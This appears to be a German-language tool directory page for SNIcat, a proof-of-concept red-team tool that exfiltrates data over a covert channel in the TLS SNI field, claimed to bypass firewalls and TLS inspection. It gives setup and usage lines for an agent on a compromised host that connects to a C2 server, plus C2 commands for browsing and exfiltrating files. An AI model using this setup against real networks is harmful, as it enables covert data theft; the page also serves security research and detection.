Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SNIcat — SNIcat | Kitploit
Tools/GitHubGitHub/mnemonic-no/snicat
DatenexfiltrationCommand and ControlRed Teaming
GitHubmnemonic-no/snicat

SNIcat

SNIcat

Repository anzeigen
12822vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SNIcat (Server-Name-Indikation-Konkatenator)

SNIcat

SNIcat ist ein Proof-of-Concept-Werkzeug, das Datenexfiltration über eine verdeckte Kanalmethode mittels Server Name Indication, einer TLS-Client-Hello-Erweiterung, durchführt. Das Werkzeug besteht aus einem Agenten, der sich auf dem kompromittierten internen Host befindet, und einem Command&Control-Server, der den Agenten steuert und exfiltrierte Daten sammelt.

Die vollständige Geschichte hinter SNIcat finden Sie in unserem Blogbeitrag

Disclaimer

SNIcat wurde auf macOS und einer Vielzahl von Linux-Distributionen getestet. Obwohl es leicht portiert werden kann, gibt es derzeit keine Windows-Version, da dies nur ein PoC-Werkzeug ist.

Die Exfiltrationsmethode funktioniert nicht mit expliziten Proxys, da bei der Verbindung über einen expliziten Proxy HTTP CONNECT und nicht TLS Client Hello verwendet wird.
SNIcat funktioniert möglicherweise nicht mit Produkten und Softwareversionen, die wir nicht getestet haben, aber das bedeutet nicht, dass die Produkte und/oder Softwareversionen nicht anfällig sind.

SNIcat in action

Background and Scenario

Wir haben eine neue heimliche Methode der Datenexfiltration entdeckt, die speziell Sicherheitsperimeterlösungen wie Web-Proxys, Next-Generation-Firewalls (NGFW) und dedizierte Lösungen für TLS-Interception und -Inspektion umgeht. Unsere Tests bestätigen, dass dies ein weit verbreitetes Problem ist, das verschiedene Arten von Sicherheitslösungen sowie Lösungen einer Vielzahl von Anbietern betrifft.

Wir haben unsere Technik erfolgreich gegen Produkte von Cisco, F5 Networks, Palo Alto Networks und Fortinet getestet und gehen davon aus, dass auch viele andere Anbieter anfällig sind.

Mit unserer Exfiltrationsmethode SNIcat haben wir festgestellt, dass wir eine Sicherheitsperimeterlösung umgehen können, die TLS-Inspektion durchführt, selbst wenn die von uns verwendete Command-&-Control-(C2-)Domäne durch übliche Reputations- und Bedrohungspräventionsfunktionen blockiert wird, die in die Sicherheitslösungen selbst integriert sind. Kurz gesagt, wir haben festgestellt, dass Lösungen, die zum Schutz von Benutzern entwickelt wurden, ihnen eine neue Sicherheitslücke eingeführt haben.

Wir haben auch eine Suricata-Signatur zur Erkennung dieses spezifischen Werkzeugs bereitgestellt.

Installation

Klonen Sie das Repository:

root@kitploit:~
https://github.com/mnemonic-no/SNIcat.git

Installieren Sie Abhängigkeiten:

root@kitploit:~
pip3 install -r requirements.txt --user

Initial setup

C2

Besorgen Sie ein Wildcard-Zertifikat und einen Schlüssel von einer öffentlich vertrauenswürdigen CA. Dies repräsentiert GOOD_CERT und GOOD_CERT_KEY.
Verwenden Sie ein selbstsigniertes Zertifikat und einen Schlüssel (nicht in einem Vertrauensspeicher) als BAD_CERT und BAD_CERT_KEY.

root@kitploit:~
(*) USAGE:      'python3 snicat_c2.py <LISTENING_PORT> <GOOD_CERT> <GOOD_CERT_KEY> <BAD_CERT> <BAD_CERT_KEY> log={on|off}'
(*) EXAMPLE:    'python3 snicat_c2_final.py 443 certs/good.pem certs/good.key certs/ssl-cert-snakeoil.pem log=off'

Agent

root@kitploit:~
(*) USAGE:      'python3 snicat_agent.py <C2_SERVER_IP> <C2_SERVER_PORT> log={on|off}'
(*) Example:    'python3 snicat_agent.py 192.0.2.1 443 log=off'

Usage

Verfügbare C2-Befehle

root@kitploit:~
LIST			 - 	alle Inhalte im aktuellen Ordner anzeigen
LS			 - 	nur Dateien im aktuellen Ordner anzeigen
SIZE			 - 	Größe der Dateien im aktuellen Ordner anzeigen
LD			 - 	alle Verzeichnisse im aktuellen Ordner anzeigen
CB			 - 	wechselt zum Wurzelverzeichnis - ähnlich wie 'cd .. '
CD <folder-id> 		 - 	wechselt in den angegebenen Ordner
EX <file-id> 		 - 	die angegebene Datei exfiltrieren
ALIVE 			 - 	Status des Agenten überprüfen (aktiv/inaktiv)
EXIT 			 - 	den C2-Server beenden
Tool herunterladen